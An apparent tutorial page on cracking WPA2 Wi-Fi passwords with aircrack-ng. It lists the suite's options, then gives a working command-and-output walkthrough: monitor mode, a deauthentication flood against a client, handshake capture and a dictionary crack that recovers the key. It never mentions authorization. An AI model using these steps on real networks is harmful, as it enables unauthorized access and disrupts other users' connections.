Cracking WPA 2 with AIRCRACK SUITE

AIRCRACK – NG

Cracking WPA 2 with AIRCRACK SUITE is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the PTW attack, thus making the attack much faster compared to other WEP cracking tools.

Usage

Syntax

[options] [<input file> [<output file>]]

Options

  Common options:

      -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
      -e <essid> : target selection: network identifier
      -b <bssid> : target selection: access point's MAC
      -p <nbcpu> : # of CPU to use  (default: all CPUs)
      -q         : enable quiet mode (no status output)
      -C <macs>  : merge the given APs to a virtual one
      -l <file>  : write key to file

  Static WEP cracking options:

      -c         : search alpha-numeric characters only
      -t         : search binary coded decimal chr only
      -h         : search the numeric key for Fritz!BOX
      -d <mask>  : use masking of the key (A1:XX:CF:YY)
      -m <maddr> : MAC address to filter usable packets
      -n <nbits> : WEP key length :  64/128/152/256/512
      -i <index> : WEP key index (1 to 4), default: any
      -f <fudge> : bruteforce fudge factor,  default: 2
      -k <korek> : disable one attack method  (1 to 17)
      -x or -x0  : disable bruteforce for last keybytes
      -x1        : last keybyte bruteforcing  (default)
      -x2        : enable last  2 keybytes bruteforcing
      -X         : disable  bruteforce   multithreading
      -y         : experimental  single bruteforce mode
      -K         : use only old KoreK attacks (pre-PTW)
      -s         : show the key in ASCII while cracking
      -M <num>   : specify maximum number of IVs to use
      -D         : WEP decloak, skips broken keystreams
      -P <num>   : PTW debug:  1: disable Klein, 2: PTW
      -1         : run only 1 try to crack key with PTW

  WEP and WPA-PSK cracking options:

      -w <words> : path to wordlist(s) filename(s)
      -r <DB>    : path to airolib-ng database
                   (Cannot be used with -w)

      --help     : Displays this usage screen


 

AIRMON – NG

This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show the interfaces status.

Usage

Syntax

airmon-ng <start|stop|check> <interface> [channel or frequency]

Options

<start|stop> indicates if you wish to start or stop the interface. (Mandatory)

 <interface> specifies the interface. (Mandatory)
[channel] optionally set the card to a specific channel.

<check|check kill> “check” will show any processes that might interfere with the aircrack-ng suite. It is strongly recommended that these processes be eliminated prior to using the aircrack-ng suite. “check kill” will check and kill off processes that might interfere with the aircrack-ng suite.


AIREPLAY – NG

The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications, Interactive packet replay, hand-crafted ARP request injection and ARP-request reinjection.

Usage

Syntax

 aireplay-ng <options> <replay interface>

Options

Filter options:

      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -u type   : frame control, type    field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -w iswep  : frame control, WEP     bit
      -D        : disable AP detection

  Replay options:

      -x nbpps  : number of packets per second
      -p fctrl  : set frame control word (hex)
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
      -g value  : change ring buffer size (default: 8)
      -F        : choose first matching packet

      Fakeauth attack options:

      -e essid  : set target AP SSID
      -o npckts : number of packets per burst (0=auto, default: 1)
      -q sec    : seconds between keep-alives
      -y prga   : keystream for shared key auth
      -T n      : exit after retry fake auth request n time

      Arp Replay attack options:

      -j        : inject FromDS packets

      Fragmentation attack options:

      -k IP     : set destination IP in fragments
      -l IP     : set source IP in fragments

      Test attack options:

      -B        : activates the bitrate test

  Source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

  Miscellaneous options:

      -R                    : disable /dev/rtc usage
      --ignore-negative-one : if the interface's channel can't be determined,
                              ignore the mismatch, needed for unpatched cfg80211

  Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen



AIRODUMP – NG

Airodump-ng is used for packet capturing of raw 802.11 frames and is particularly suitable for collecting WEPIVs (Initialization Vector) for the intent of using them with aircrack-ng. If you have a GPS receiver connected to the computer, airodump-ng is capable of logging the coordinates of the found access points.

Usage

Syntax

airodump-ng <options> <interface>[,<interface>,...]

Options

      --ivs                 : Save only captured IVs
      --gpsd                : Use GPSd
      --write      <prefix> : Dump file prefix
      -w                    : same as --write 
      --beacons             : Record all beacons in dump file
      --update       <secs> : Display update delay in seconds
      --showack             : Prints ack/cts/rts statistics
      -h                    : Hides known stations for --showack
      -f            <msecs> : Time in ms between hopping channels
      --berlin       <secs> : Time before removing the AP/client
                              from the screen when no more packets
                              are received (Default: 120 seconds)
      -r             <file> : Read packets from that file
      -x            <msecs> : Active Scanning Simulation
      --output-format
                  <formats> : Output format. Possible values:
                              pcap, ivs, csv, gps, kismet, netxml
      --ignore-negative-one : Removes the message that says
                              fixed channel <interface>: -1

  Filter options:
      --encrypt   <suite>   : Filter APs by cipher suite
      --netmask <netmask>   : Filter APs by mask
      --bssid     <bssid>   : Filter APs by BSSID
      -a                    : Filter unassociated clients

  By default, airodump-ng hop on 2.4GHz channels.
  You can make it capture on other/specific channel(s) by using:
      --channel <channels>  : Capture on specific channels
      --band <abg>          : Band on which airodump-ng should hop
      -C    <frequencies>   : Uses these frequencies in MHz to hop
      --cswitch  <method>   : Set channel switching method
                    0       : FIFO (default)
                    1       : Round Robin
                    2       : Hop on last
      -s                    : same as --cswitch

      --help                : Displays this usage screen


Example

Cracking WPA 2 :

First Check Your Wlan Interface :

cyborg@cyborg:~$ sudo airmon-ng 


Interface	Chipset		Driver

wlan0		RTL8187 	rtl8187 - [phy0]

Enable Monitor Mode in your wireless interface (Optionally at your preferred channel) :

cyborg@cyborg:~$ sudo airmon-ng start  wlan0 1


Found 6 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID	Name
920	avahi-daemon
924	avahi-daemon
1031	NetworkManager
1246	dhclient
1294	wpa_supplicant
1671	dhclient
Process with PID 1671 (dhclient) is running on interface wlan0


Interface	Chipset		Driver

wlan0		RTL8187 	rtl8187 - [phy0]
				(monitor mode enabled on mon0

Find BSSID of your target wireless network :

cyborg@cyborg:~$ sudo airodump-ng -c 1  -w capture mon0
[sudo] password for cyborg: 


 CH  1 ][ Elapsed: 0 s ][ 2012-06-03 17:50 ]         
                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
                                                                               
 10:FE:ED:B7:A5:42  -34   0       11        2    0   1  54e  WPA2 CCMP   PSK  t
                                                                               
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes 

here , 10:FE:ED:B7:A5:42 is our BSSID .

Start Packet capturing using AIRODUMP-NG :

cyborg@cyborg:~$ sudo airodump-ng -c 1  -w packetscap --bssid  10:FE:ED:B7:A5:42 wlan0


 CH  1 ][ Elapsed: 2 mins ][ 2012-06-03 17:44 [ WPA handshake: 10:FE:ED:B7:A5:42                                  
                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
                                                                               
 10:FE:ED:B7:A5:42  -30   0     1393      382    2   1  54e  WPA2 CCMP   PSK  t
                                                                               
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes     
                                                                               
 10:FE:ED:B7:A5:42  C8:F7:33:77:1A:BE    0    0 - 1     60    32659             
 10:FE:ED:B7:A5:42  94:EB:CD:4A:48:5C  -18    0 - 2      0      123             
 10:FE:ED:B7:A5:42  D8:3C:69:76:09:96  -24    0 - 1      2       15             
 10:FE:ED:B7:A5:42  74:DE:2B:C3:A0:2F  -25    1e- 1      0       55             
 10:FE:ED:B7:A5:42  FA:76:18:D1:D8:28  -25   36 - 1      0      172             

 DeAuth Client to make packet capturing fast with AIREPLAY-NG

cyborg@cyborg:~$ sudo aireplay-ng -0 1000 -a  10:FE:ED:B7:A5:42 -c C8:F7:33:77:1A:BE wlan0
17:42:38  Waiting for beacon frame (BSSID: 10:FE:ED:B7:A5:42) on channel 1
17:42:39  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [51|67 ACKs]
17:42:40  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:40  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:41  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:41  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:42  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:42  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 6|64 ACKs]
17:42:43  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:43  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:44  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:44  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:45  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]
17:42:45  Sending 64 directed DeAuth. STMAC: [C8:F7:33:77:1A:BE] [ 0|64 ACKs]

Crack WPA  with Captured 4-Way Handshake :

cyborg@cyborg:~$ aircrack-ng -w dict.txt -b 10:FE:ED:B7:A5:42 packetscap.cap
Opening packetscap.cap
Opening packetscap1.cap
Reading packets, please wait...


                                 Aircrack-ng 1.1


                   [00:00:00] 94 keys tested (296.78 k/s)


                          KEY FOUND! [ trendztrela ]


      Master Key     : 20 B5 5F 4B 85 49 89 18 05 B5 E1 A2 3D 1D E1 3A 
                       93 B4 4E 92 08 57 A1 DC DD 2E 31 F9 F3 73 C8 41 

      Transient Key  : AD B3 0A 8F C7 4B 18 2D 35 30 6A 1B 6C 36 87 10 
                       8E 5B 16 7F 74 25 F3 AC 81 36 3C 71 7F 66 67 41 
                       54 E1 74 F2 23 31 87 90 59 1E EA C9 D4 6E 66 1B 
                       66 66 3A C2 3C 81 49 CC 4B 31 4C BF 6E 91 C7 76 

      EAPOL HMAC     : 35 35 91 F8 43 47 11 21 2D 63 15 0E 02 A2 A1 47



TroubleShooting :

Device or Resource busy:

Sometimes  airodump shows device or resource busy , it may be because device is set to managed mode rather than monitor :

cyborg@cyborg:~$ iwconfig wlan0
wlan0     IEEE 802.11bg  ESSID:"tempztrela"  
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated
          Bit Rate=1 Mb/s   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=70/70  Signal level=-36 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:1  Invalid misc:0   Missed beacon:0

To solve this , run the following commands :

cyborg@cyborg:~$ sudo ifconfig wlan0 down
cyborg@cyborg:~$ sudo iwconfig wlan0 mode monitor
cyborg@cyborg:~$ sudo ifconfig wlan0 up
cyborg@cyborg:~$ iwconfig wlan0
wlan0     IEEE 802.11bg  Mode:Monitor  Frequency:2.412 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Handshake Captured but not showing :

To see if you captured any handshake packets, there are two ways. Watch the airodump-ng screen for “ WPA handshake:10:FE:ED:B7:A5:42” in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot.

Use Wireshark and apply a filter of “eapol”. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets.

Negative Fixed Channel :

Add –ignore-negative-one after airodump and aireplay command if you are using mon0 .

0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?